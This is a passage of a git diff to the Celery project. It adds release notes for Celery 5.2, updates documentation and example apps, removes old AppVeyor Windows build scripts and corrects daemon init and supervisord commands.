-:meth:`~@control.inspect.reserved`:
+:meth:`~celery.app.control.Inspect.reserved`:
.. code-block:: pycon
@@ -852,201 +862,14 @@ Statistics
----------
The remote control command ``inspect stats`` (or
-:meth:`~@control.inspect.stats`) will give you a long list of useful (or not
+:meth:`~celery.app.control.Inspect.stats`) will give you a long list of useful (or not
so useful) statistics about the worker:
.. code-block:: console
$ celery -A proj inspect stats
-The output will include the following fields:
-
-- ``broker``
-
- Section for broker information.
-
- * ``connect_timeout``
-
- Timeout in seconds (int/float) for establishing a new connection.
-
- * ``heartbeat``
-
- Current heartbeat value (set by client).
-
- * ``hostname``
-
- Node name of the remote broker.
-
- * ``insist``
-
- No longer used.
-
- * ``login_method``
-
- Login method used to connect to the broker.
-
- * ``port``
-
- Port of the remote broker.
-
- * ``ssl``
-
- SSL enabled/disabled.
-
- * ``transport``
-
- Name of transport used (e.g., ``amqp`` or ``redis``)
-
- * ``transport_options``
-
- Options passed to transport.
-
- * ``uri_prefix``
-
- Some transports expects the host name to be a URL.
-
- .. code-block:: text
-
- redis+socket:///tmp/redis.sock
-
- In this example the URI-prefix will be ``redis``.
-
- * ``userid``
-
- User id used to connect to the broker with.
-
- * ``virtual_host``
-
- Virtual host used.
-
-- ``clock``
-
- Value of the workers logical clock. This is a positive integer and should
- be increasing every time you receive statistics.
-
-- ``uptime``
-
- Numbers of seconds since the worker controller was started
-
-- ``pid``
-
- Process id of the worker instance (Main process).
-
-- ``pool``
-
- Pool-specific section.
-
- * ``max-concurrency``
-
- Max number of processes/threads/green threads.
-
- * ``max-tasks-per-child``
-
- Max number of tasks a thread may execute before being recycled.
-
- * ``processes``
-
- List of PIDs (or thread-id's).
-
- * ``put-guarded-by-semaphore``
-
- Internal
-
- * ``timeouts``
-
- Default values for time limits.
-
- * ``writes``
-
- Specific to the prefork pool, this shows the distribution of writes
- to each process in the pool when using async I/O.
-
-- ``prefetch_count``
-
- Current prefetch count value for the task consumer.
-
-- ``rusage``
-
- System usage statistics. The fields available may be different
- on your platform.
-
- From :manpage:`getrusage(2)`:
-
- * ``stime``
-
- Time spent in operating system code on behalf of this process.
-
- * ``utime``
-
- Time spent executing user instructions.
-
- * ``maxrss``
-
- The maximum resident size used by this process (in kilobytes).
-
- * ``idrss``
-
- Amount of non-shared memory used for data (in kilobytes times ticks of
- execution)
-
- * ``isrss``
-
- Amount of non-shared memory used for stack space (in kilobytes times
- ticks of execution)
-
- * ``ixrss``
-
- Amount of memory shared with other processes (in kilobytes times
- ticks of execution).
-
- * ``inblock``
-
- Number of times the file system had to read from the disk on behalf of
- this process.
-
- * ``oublock``
-
- Number of times the file system has to write to disk on behalf of
- this process.
-
- * ``majflt``
-
- Number of page faults that were serviced by doing I/O.
-
- * ``minflt``
-
- Number of page faults that were serviced without doing I/O.
-
- * ``msgrcv``
-
- Number of IPC messages received.
-
- * ``msgsnd``
-
- Number of IPC messages sent.
-
- * ``nvcsw``
-
- Number of times this process voluntarily invoked a context switch.
-
- * ``nivcsw``
-
- Number of times an involuntary context switch took place.
-
- * ``nsignals``
-
- Number of signals received.
-
- * ``nswap``
-
- The number of times this process was swapped entirely out of memory.
-
-
-- ``total``
-
- Map of task names and the total number of tasks with that type
- the worker has accepted since start-up.
-
+For the output details, consult the reference documentation of :meth:`~celery.app.control.Inspect.stats`.
Additional Commands
===================
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
new file mode 100644
index 00000000000..1180a653c63
--- /dev/null
+++ b/docs/whatsnew-5.2.rst
@@ -0,0 +1,393 @@
+.. _whatsnew-5.2:
+
+=========================================
+ What's new in Celery 5.2 (Dawn Chorus)
+=========================================
+:Author: Omer Katz (``omer.drow at gmail.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions,
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with python.
+
+It's a task queue with focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors,
+you should come join us :ref:`on IRC `
+or :ref:`our mailing-list `.
+
+.. note::
+
+ Following the problems with Freenode, we migrated our IRC channel to Libera Chat
+ as most projects did.
+ You can also join us using `Gitter `_.
+
+ We're sometimes there to answer questions. We welcome you to join.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions
+it's important that you read the following section as this release
+is a new major version.
+
+This version is officially supported on CPython 3.7 & 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+.. note::
+
+ **This release contains fixes for two (potentially severe) memory leaks.
+ We encourage our users to upgrade to this release as soon as possible.**
+
+The 5.2.0 release is a new minor release for Celery.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Dawn Chorus `_.
+
+From now on we only support Python 3.7 and above.
+We will maintain compatibility with Python 3.7 until it's
+EOL in June, 2023.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+We no longer support Celery 4.x as we don't have the resources to do so.
+If you'd like to help us, all contributions are welcome.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't not include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+do not affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.2
+-----------------------------
+
+At this point you can upgrade your workers and clients with the new version.
+
+.. _v520-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python versions are:
+
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.7 7.3 (``pypy3``)
+
+Experimental support
+~~~~~~~~~~~~~~~~~~~~
+
+Celery supports these Python versions provisionally as they are not production
+ready yet:
+
+- CPython 3.10 (currently in RC2)
+
+Memory Leak Fixes
+-----------------
+
+Two severe memory leaks have been fixed in this version:
+
+* :class:`celery.result.ResultSet` no longer holds a circular reference to itself.
+* The prefork pool no longer keeps messages in its cache forever when the master
+ process disconnects from the broker.
+
+The first memory leak occurs when you use :class:`celery.result.ResultSet`.
+Each instance held a promise which provides that instance as an argument to
+the promise's callable.
+This caused a circular reference which kept the ResultSet instance in memory
+forever since the GC couldn't evict it.
+The provided argument is now a :func:`weakref.proxy` of the ResultSet's
+instance.
+The memory leak mainly occurs when you use :class:`celery.result.GroupResult`
+since it inherits from :class:`celery.result.ResultSet` which doesn't get used
+that often.
+
+The second memory leak exists since the inception of the project.
+The prefork pool maintains a cache of the jobs it executes.
+When they are complete, they are evicted from the cache.
+However, when Celery disconnects from the broker, we flush the pool
+and discard the jobs, expecting that they'll be cleared later once the worker
+acknowledges them but that has never been the case.
+Instead, these jobs remain forever in memory.
+We now discard those jobs immediately while flushing.
+
+Dropped support for Python 3.6
+------------------------------
+
+Celery now requires Python 3.7 and above.
+
+Python 3.6 will reach EOL in December, 2021.
+In order to focus our efforts we have dropped support for Python 3.6 in
+this version.
+
+If you still require to run Celery using Python 3.6
+you can still use Celery 5.1.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 3.6 after
+the 23th of December, 2021.
+
+Tasks
+-----
+
+When replacing a task with another task, we now give an indication of the
+replacing nesting level through the ``replaced_task_nesting`` header.
+
+A task which was never replaced has a ``replaced_task_nesting`` value of 0.
+
+Kombu
+-----
+
+Starting from v5.2, the minimum required version is Kombu 5.2.0.
+
+Prefork Workers Pool
+---------------------
+
+Now all orphaned worker processes are killed automatically when main process exits.
+
+Eventlet Workers Pool
+---------------------
+
+You can now terminate running revoked tasks while using the
+Eventlet Workers Pool.
+
+Custom Task Classes
+-------------------
+
+We introduced a custom handler which will be executed before the task
+is started called ``before_start``.
+
+See :ref:`custom-task-cls-app-wide` for more details.
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 has reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 has reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still require to run Celery using Python 2.7 or Python 3.5
+you can still use Celery 4.x.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 `_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below which prevents us from
+supporting it and it is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of notice in advance but we feel that the chance
+you'll be affected by this breaking change is minimal which is why we
+did it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules has been deprecated
+in version 4.0 and therefore are removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v520-news:
+
+Bug: Pymongo 3.12.1 is not compatible with Celery 5.2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For now we are limiting Pymongo version, only allowing for versions between 3.3.0 and 3.12.0.
+
+This will be fixed in the next patch.
+
+News
+====
+
+Support for invoking chords of unregistered tasks
+-------------------------------------------------
+
+Previously if you attempted to publish a chord
+while providing a signature which wasn't registered in the Celery app publishing
+the chord as the body of the chord, an :exc:`celery.exceptions.NotRegistered`
+exception would be raised.
+
+From now on, you can publish these sort of chords and they would be executed
+correctly:
+
+.. code-block:: python
+
+ # movies.task.publish_movie is registered in the current app
+ movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True)
+ # news.task.publish_news is *not* registered in the current app
+ news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True)
+
+ my_chord = chain(movie_task,
+ group(movie_task.set(task_id=str(uuid.uuid4())),
+ movie_task.set(task_id=str(uuid.uuid4()))),
+ news_task)
+ my_chord.apply_async() # <-- No longer raises an exception
+
+Consul Result Backend
+---------------------
+
+We now create a new client per request to Consul to avoid a bug in the Consul
+client.
+
+The Consul Result Backend now accepts a new
+:setting:`result_backend_transport_options` key: ``one_client``.
+You can opt out of this behavior by setting ``one_client`` to True.
+
+Please refer to the documentation of the backend if you're using the Consul
+backend to find out which behavior suites you.
+
+Filesystem Result Backend
+-------------------------
+
+We now cleanup expired task results while using the
+filesystem result backend as most result backends do.
+
+ArangoDB Result Backend
+-----------------------
+
+You can now check the validity of the CA certificate while making
+a TLS connection to ArangoDB result backend.
+
+If you'd like to do so, set the ``verify`` key in the
+:setting:`arangodb_backend_settings`` dictionary to ``True``.
diff --git a/examples/app/myapp.py b/examples/app/myapp.py
index 3490a3940bd..7ee8727095a 100644
--- a/examples/app/myapp.py
+++ b/examples/app/myapp.py
@@ -2,7 +2,7 @@
Usage::
- (window1)$ python myapp.py worker -l info
+ (window1)$ python myapp.py worker -l INFO
(window2)$ python
>>> from myapp import add
@@ -13,13 +13,13 @@
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
- $ celery -A myapp worker -l info
+ $ celery -A myapp worker -l INFO
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
- $ celery -A myapp:app worker -l info
+ $ celery -A myapp:app worker -l INFO
"""
diff --git a/examples/celery_http_gateway/manage.py b/examples/celery_http_gateway/manage.py
index 2c41aaabd87..3109e100b4d 100644
--- a/examples/celery_http_gateway/manage.py
+++ b/examples/celery_http_gateway/manage.py
@@ -3,7 +3,7 @@
from django.core.management import execute_manager
try:
- import settings # Assumed to be in the same directory.
+ import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write(
diff --git a/examples/celery_http_gateway/settings.py b/examples/celery_http_gateway/settings.py
index a671b980e49..d8001673c90 100644
--- a/examples/celery_http_gateway/settings.py
+++ b/examples/celery_http_gateway/settings.py
@@ -75,11 +75,11 @@
'django.template.loaders.app_directories.load_template_source',
)
-MIDDLEWARE_CLASSES = (
+MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
-)
+]
ROOT_URLCONF = 'celery_http_gateway.urls'
diff --git a/examples/celery_http_gateway/urls.py b/examples/celery_http_gateway/urls.py
index 522b39ff8d1..c916ff8029b 100644
--- a/examples/celery_http_gateway/urls.py
+++ b/examples/celery_http_gateway/urls.py
@@ -1,7 +1,6 @@
+from celery_http_gateway.tasks import hello_world
from django.conf.urls.defaults import (handler404, handler500, # noqa
include, patterns, url)
-
-from celery_http_gateway.tasks import hello_world
from djcelery import views as celery_views
# Uncomment the next two lines to enable the admin:
diff --git a/examples/django/README.rst b/examples/django/README.rst
index 0334ef7df04..80d7a13cadd 100644
--- a/examples/django/README.rst
+++ b/examples/django/README.rst
@@ -46,7 +46,7 @@ Starting the worker
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
Running a task
===================
diff --git a/examples/django/demoapp/models.py b/examples/django/demoapp/models.py
index bec42a2b041..1f7d09ead22 100644
--- a/examples/django/demoapp/models.py
+++ b/examples/django/demoapp/models.py
@@ -1,4 +1,4 @@
-from django.db import models # noqa
+from django.db import models
class Widget(models.Model):
diff --git a/examples/django/demoapp/tasks.py b/examples/django/demoapp/tasks.py
index ac309b8c9fd..c16b76b4c4f 100644
--- a/examples/django/demoapp/tasks.py
+++ b/examples/django/demoapp/tasks.py
@@ -1,8 +1,9 @@
# Create your tasks here
-from celery import shared_task
from demoapp.models import Widget
+from celery import shared_task
+
@shared_task
def add(x, y):
diff --git a/examples/django/proj/celery.py b/examples/django/proj/celery.py
index 429afff312a..9766a2ac2ee 100644
--- a/examples/django/proj/celery.py
+++ b/examples/django/proj/celery.py
@@ -2,7 +2,7 @@
from celery import Celery
-# set the default Django settings module for the 'celery' program.
+# Set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
app = Celery('proj')
@@ -13,7 +13,7 @@
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
-# Load task modules from all registered Django app configs.
+# Load task modules from all registered Django apps.
app.autodiscover_tasks()
diff --git a/examples/django/proj/urls.py b/examples/django/proj/urls.py
index 2616749dd6e..5f67c27b660 100644
--- a/examples/django/proj/urls.py
+++ b/examples/django/proj/urls.py
@@ -1,4 +1,4 @@
-from django.conf.urls import handler404, handler500, include, url # noqa
+from django.urls import handler404, handler500, include, url # noqa
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
diff --git a/examples/django/proj/wsgi.py b/examples/django/proj/wsgi.py
index 1bb1b542185..d07dbf074cc 100644
--- a/examples/django/proj/wsgi.py
+++ b/examples/django/proj/wsgi.py
@@ -19,7 +19,7 @@
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
-from django.core.wsgi import get_wsgi_application # noqa
+from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
diff --git a/examples/django/requirements.txt b/examples/django/requirements.txt
index 72e653a9d83..4ba37fb5b8a 100644
--- a/examples/django/requirements.txt
+++ b/examples/django/requirements.txt
@@ -1,3 +1,3 @@
-django>=2.0.0
+django>=2.2.1
sqlalchemy>=1.0.14
-celery>=4.3.0
+celery>=5.0.5
diff --git a/examples/eventlet/README.rst b/examples/eventlet/README.rst
index 672ff6f1461..84a1856f314 100644
--- a/examples/eventlet/README.rst
+++ b/examples/eventlet/README.rst
@@ -18,7 +18,7 @@ Before you run any of the example tasks you need to start
the worker::
$ cd examples/eventlet
- $ celery worker -l info --concurrency=500 --pool=eventlet
+ $ celery worker -l INFO --concurrency=500 --pool=eventlet
As usual you need to have RabbitMQ running, see the Celery getting started
guide if you haven't installed it yet.
diff --git a/examples/eventlet/webcrawler.py b/examples/eventlet/webcrawler.py
index 80fb523a742..617e9187567 100644
--- a/examples/eventlet/webcrawler.py
+++ b/examples/eventlet/webcrawler.py
@@ -23,15 +23,15 @@
import re
import requests
-
-from celery import group, task
from eventlet import Timeout
from pybloom import BloomFilter
+from celery import group, task
+
try:
from urllib.parse import urlsplit
except ImportError:
- from urlparse import urlsplit # noqa
+ from urlparse import urlsplit
# http://daringfireball.net/2009/11/liberal_regex_for_matching_urls
url_regex = re.compile(
diff --git a/examples/next-steps/proj/celery.py b/examples/next-steps/proj/celery.py
index f9be2a1c549..39ce69199a9 100644
--- a/examples/next-steps/proj/celery.py
+++ b/examples/next-steps/proj/celery.py
@@ -2,7 +2,7 @@
app = Celery('proj',
broker='amqp://',
- backend='amqp://',
+ backend='rpc://',
include=['proj.tasks'])
# Optional configuration, see the application user guide.
diff --git a/examples/next-steps/setup.py b/examples/next-steps/setup.py
index 8d9415cbd29..50449e59934 100644
--- a/examples/next-steps/setup.py
+++ b/examples/next-steps/setup.py
@@ -14,26 +14,26 @@
author='Ola A. Normann',
author_email='author@example.com',
keywords='our celery integration',
- version='1.0',
+ version='2.0',
description='Tasks for my project',
long_description=__doc__,
license='BSD',
packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']),
- test_suite='nose.collector',
+ test_suite='pytest',
zip_safe=False,
install_requires=[
- 'celery>=4.0',
+ 'celery>=5.0',
# 'requests',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: BSD License',
- 'Programming Language :: Python :: 2',
- 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
- 'Programming Language :: Python :: 3.5',
+ 'Programming Language :: Python :: 3.6',
+ 'Programming Language :: Python :: 3.7',
+ 'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
- 'Programming Language :: Python :: Implementation :: PyPy',
+ 'Programming Language :: Python :: Implementation :: PyPy3',
'Operating System :: OS Independent',
],
)
diff --git a/examples/periodic-tasks/myapp.py b/examples/periodic-tasks/myapp.py
index 166b9234146..b2e4f0b8045 100644
--- a/examples/periodic-tasks/myapp.py
+++ b/examples/periodic-tasks/myapp.py
@@ -3,10 +3,10 @@
Usage::
# The worker service reacts to messages by executing tasks.
- (window1)$ python myapp.py worker -l info
+ (window1)$ python myapp.py worker -l INFO
# The beat service sends messages at scheduled intervals.
- (window2)$ python myapp.py beat -l info
+ (window2)$ python myapp.py beat -l INFO
# XXX To diagnose problems use -l debug:
(window2)$ python myapp.py beat -l debug
@@ -18,13 +18,13 @@
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
- $ celery -A myapp worker -l info
+ $ celery -A myapp worker -l INFO
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
- $ celery -A myapp:app worker -l info
+ $ celery -A myapp:app worker -l INFO
"""
diff --git a/examples/security/mysecureapp.py b/examples/security/mysecureapp.py
index 9578fa62272..21061a890da 100644
--- a/examples/security/mysecureapp.py
+++ b/examples/security/mysecureapp.py
@@ -14,7 +14,7 @@
cd examples/security
- (window1)$ python mysecureapp.py worker -l info
+ (window1)$ python mysecureapp.py worker -l INFO
(window2)$ cd examples/security
(window2)$ python
diff --git a/extra/appveyor/install.ps1 b/extra/appveyor/install.ps1
deleted file mode 100644
index 7166f65e37a..00000000000
--- a/extra/appveyor/install.ps1
+++ /dev/null
@@ -1,85 +0,0 @@
-# Sample script to install Python and pip under Windows
-# Authors: Olivier Grisel and Kyle Kastner
-# License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-
-$BASE_URL = "https://www.python.org/ftp/python/"
-$GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
-$GET_PIP_PATH = "C:\get-pip.py"
-
-
-function DownloadPython ($python_version, $platform_suffix) {
- $webclient = New-Object System.Net.WebClient
- $filename = "python-" + $python_version + $platform_suffix + ".msi"
- $url = $BASE_URL + $python_version + "/" + $filename
-
- $basedir = $pwd.Path + "\"
- $filepath = $basedir + $filename
- if (Test-Path $filename) {
- Write-Host "Reusing" $filepath
- return $filepath
- }
-
- # Download and retry up to 5 times in case of network transient errors.
- Write-Host "Downloading" $filename "from" $url
- $retry_attempts = 3
- for($i=0; $i -lt $retry_attempts; $i++){
- try {
- $webclient.DownloadFile($url, $filepath)
- break
- }
- Catch [Exception]{
- Start-Sleep 1
- }
- }
- Write-Host "File saved at" $filepath
- return $filepath
-}
-
-
-function InstallPython ($python_version, $architecture, $python_home) {
- Write-Host "Installing Python" $python_version "for" $architecture "bit architecture to" $python_home
- if (Test-Path $python_home) {
- Write-Host $python_home "already exists, skipping."
- return $false
- }
- if ($architecture -eq "32") {
- $platform_suffix = ""
- } else {
- $platform_suffix = ".amd64"
- }
- $filepath = DownloadPython $python_version $platform_suffix
- Write-Host "Installing" $filepath "to" $python_home
- $args = "/qn /i $filepath TARGETDIR=$python_home"
- Write-Host "msiexec.exe" $args
- Start-Process -FilePath "msiexec.exe" -ArgumentList $args -Wait -Passthru
- Write-Host "Python $python_version ($architecture) installation complete"
- return $true
-}
-
-
-function InstallPip ($python_home) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- $python_path = $python_home + "/python.exe"
- if (-not(Test-Path $pip_path)) {
- Write-Host "Installing pip..."
- $webclient = New-Object System.Net.WebClient
- $webclient.DownloadFile($GET_PIP_URL, $GET_PIP_PATH)
- Write-Host "Executing:" $python_path $GET_PIP_PATH
- Start-Process -FilePath "$python_path" -ArgumentList "$GET_PIP_PATH" -Wait -Passthru
- } else {
- Write-Host "pip already installed."
- }
-}
-
-function InstallPackage ($python_home, $pkg) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- & $pip_path install $pkg
-}
-
-function main () {
- InstallPython $env:PYTHON_VERSION $env:PYTHON_ARCH $env:PYTHON
- InstallPip $env:PYTHON
- InstallPackage $env:PYTHON wheel
-}
-
-main
diff --git a/extra/appveyor/run_with_compiler.cmd b/extra/appveyor/run_with_compiler.cmd
deleted file mode 100644
index 31bd205ecbb..00000000000
--- a/extra/appveyor/run_with_compiler.cmd
+++ /dev/null
@@ -1,47 +0,0 @@
-:: To build extensions for 64 bit Python 3, we need to configure environment
-:: variables to use the MSVC 2010 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 4 (SDK v7.1)
-::
-:: To build extensions for 64 bit Python 2, we need to configure environment
-:: variables to use the MSVC 2008 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 3.5 (SDK v7.0)
-::
-:: 32 bit builds do not require specific environment configurations.
-::
-:: Note: this script needs to be run with the /E:ON and /V:ON flags for the
-:: cmd interpreter, at least for (SDK v7.0)
-::
-:: More details at:
-:: https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows
-:: https://stackoverflow.com/a/13751649/163740
-::
-:: Author: Olivier Grisel
-:: License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-@ECHO OFF
-
-SET COMMAND_TO_RUN=%*
-SET WIN_SDK_ROOT=C:\Program Files\Microsoft SDKs\Windows
-
-SET MAJOR_PYTHON_VERSION="%PYTHON_VERSION:~0,1%"
-IF %MAJOR_PYTHON_VERSION% == "2" (
- SET WINDOWS_SDK_VERSION="v7.0"
-) ELSE IF %MAJOR_PYTHON_VERSION% == "3" (
- SET WINDOWS_SDK_VERSION="v7.1"
-) ELSE (
- ECHO Unsupported Python version: "%MAJOR_PYTHON_VERSION%"
- EXIT 1
-)
-
-IF "%PYTHON_ARCH%"=="64" (
- ECHO Configuring Windows SDK %WINDOWS_SDK_VERSION% for Python %MAJOR_PYTHON_VERSION% on a 64 bit architecture
- SET DISTUTILS_USE_SDK=1
- SET MSSdk=1
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Setup\WindowsSdkVer.exe" -q -version:%WINDOWS_SDK_VERSION%
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Bin\SetEnv.cmd" /x64 /release
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-) ELSE (
- ECHO Using default MSVC build environment for 32 bit architecture
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-)
diff --git a/extra/generic-init.d/celerybeat b/extra/generic-init.d/celerybeat
index 8f977903e3a..c875e33e27d 100755
--- a/extra/generic-init.d/celerybeat
+++ b/extra/generic-init.d/celerybeat
@@ -25,7 +25,7 @@ echo "celery init v${VERSION}."
if [ $(id -u) -ne 0 ]; then
echo "Error: This program can only be used by the root user."
- echo " Unpriviliged users must use 'celery beat --detach'"
+ echo " Unprivileged users must use 'celery beat --detach'"
exit 1
fi
@@ -110,7 +110,7 @@ DEFAULT_USER="celery"
DEFAULT_PID_FILE="/var/run/celery/beat.pid"
DEFAULT_LOG_FILE="/var/log/celery/beat.log"
DEFAULT_LOG_LEVEL="INFO"
-DEFAULT_CELERYBEAT="$CELERY_BIN beat"
+DEFAULT_CELERYBEAT="$CELERY_BIN"
CELERYBEAT=${CELERYBEAT:-$DEFAULT_CELERYBEAT}
CELERYBEAT_LOG_LEVEL=${CELERYBEAT_LOG_LEVEL:-${CELERYBEAT_LOGLEVEL:-$DEFAULT_LOG_LEVEL}}
@@ -141,8 +141,6 @@ fi
export CELERY_LOADER
-CELERYBEAT_OPTS="$CELERYBEAT_OPTS -f $CELERYBEAT_LOG_FILE -l $CELERYBEAT_LOG_LEVEL"
-
if [ -n "$2" ]; then
CELERYBEAT_OPTS="$CELERYBEAT_OPTS $2"
fi
@@ -254,8 +252,11 @@ _chuid () {
start_beat () {
echo "Starting ${SCRIPT_NAME}..."
- _chuid $CELERY_APP_ARG $CELERYBEAT_OPTS $DAEMON_OPTS --detach \
- --pidfile="$CELERYBEAT_PID_FILE"
+ _chuid $CELERY_APP_ARG $DAEMON_OPTS beat --detach \
+ --pidfile="$CELERYBEAT_PID_FILE" \
+ --logfile="$CELERYBEAT_LOG_FILE" \
+ --loglevel="$CELERYBEAT_LOG_LEVEL" \
+ $CELERYBEAT_OPTS
}
diff --git a/extra/generic-init.d/celeryd b/extra/generic-init.d/celeryd
index 56d92beac2c..b928eebeb70 100755
--- a/extra/generic-init.d/celeryd
+++ b/extra/generic-init.d/celeryd
@@ -269,7 +269,7 @@ dryrun () {
stop_workers () {
- _chuid stopwait $CELERYD_NODES --pidfile="$CELERYD_PID_FILE"
+ _chuid stopwait $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE"
}
diff --git a/extra/supervisord/celerybeat.conf b/extra/supervisord/celerybeat.conf
index c920b30dfda..8710c31ac1f 100644
--- a/extra/supervisord/celerybeat.conf
+++ b/extra/supervisord/celerybeat.conf
@@ -4,7 +4,7 @@
[program:celerybeat]
; Set full path to celery program if using virtualenv
-command=celery beat -A myapp --schedule /var/lib/celery/beat.db --loglevel=INFO
+command=celery -A myapp beat --schedule /var/lib/celery/beat.db --loglevel=INFO
